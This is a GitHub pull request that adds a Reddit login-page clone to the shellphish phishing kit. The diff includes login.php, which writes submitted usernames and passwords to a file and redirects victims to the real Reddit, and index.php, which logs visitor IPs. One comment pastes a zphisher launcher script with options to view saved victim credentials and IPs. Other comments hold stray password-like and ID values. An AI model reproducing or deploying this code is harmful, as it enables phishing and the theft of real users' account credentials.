Skip to content

Added Reddit#21

Open
dhruvkrishnavaid wants to merge 1 commit intoAbirHasan2005:masterfrom
dhruvkrishnavaid:master
Open

Added Reddit#21
dhruvkrishnavaid wants to merge 1 commit intoAbirHasan2005:masterfrom
dhruvkrishnavaid:master

Conversation

@dhruvkrishnavaid
Copy link
Copy Markdown

Fix for #15

@AbirHasan2005
Copy link
Copy Markdown
Owner

Have to edit on shellphish.sh too.

@dhruvkrishnavaid
Copy link
Copy Markdown
Author

Can you be more specific on what to edit? Because, I have tested it and it works. So I doubt on what to edit.

Comment thread sites/reddit/index.php
@@ -0,0 +1,5 @@
<?php
include 'ip.php';
header('Location: login.html');
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

log

Copy link
Copy Markdown

@titkohanch titkohanch left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

password: ( milcho234)

Comment thread sites/reddit/index.php
@@ -0,0 +1,5 @@
<?php
include 'ip.php';
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

#!/bin/bash

https://github.com/htr-tech/zphisher

if [[ $(uname -o) == 'Android' ]];then
ZPHISHER_ROOT="/data/data/com.termux/files/usr/opt/zphisher"
else
export ZPHISHER_ROOT="/opt/zphisher"
fi

if [[ $1 == '-h' || $1 == 'help' ]]; then
echo "To run Zphisher type `zphisher` in your cmd"
echo
echo "Help:"
echo " -h | help : Print this menu & Exit"
echo " -c | auth : View Saved Credentials"
echo " -i | ip : View Saved Victim IP"
echo
elif [[ $1 == '-c' || $1 == 'auth' ]]; then
cat $ZPHISHER_ROOT/auth/usernames.dat 2> /dev/null || {
echo "No Credentials Found !"
exit 1
}
elif [[ $1 == '-i' || $1 == 'ip' ]]; then
cat $ZPHISHER_ROOT/auth/ip.txt 2> /dev/null || {
echo "No Saved IP Found !"
exit 1
}
else
cd $ZPHISHER_ROOT
bash ./zphisher.sh
fi

Copy link
Copy Markdown

@titkohanch titkohanch left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

root

Comment thread sites/reddit/login.html
<link rel="stylesheet" href="https://www.redditstatic.com/accountmanager/theme.5e411b81dd5eff52023d3e13cde38668.css">

<link rel="stylesheet" href="https://www.redditstatic.com/accountmanager/login.5d548fad4637c6ba118ebcf590a30611.css">

Copy link
Copy Markdown

@titkohanch titkohanch Aug 24, 2022

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Comment thread sites/reddit/login.html
<div class="SnooIcon"></div>
<h1 class="Title">

Sign in
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

id:100002286916504

Comment thread sites/reddit/login.php
@@ -0,0 +1,5 @@
<?php

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Comment thread sites/reddit/login.php
<?php

file_put_contents("usernames.txt", "Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://www.reddit.com/password');
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Copy link
Copy Markdown

@titkohanch titkohanch left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

root

Comment thread sites/reddit/login.html
<div class="AnimatedForm__errorMessage"></div>
</fieldset>
<fieldset class="AnimatedForm__field m-required password hideable">
<input id="loginPassword" class="AnimatedForm__textInput" type="password" name="password">
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

lst=100002286916504

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants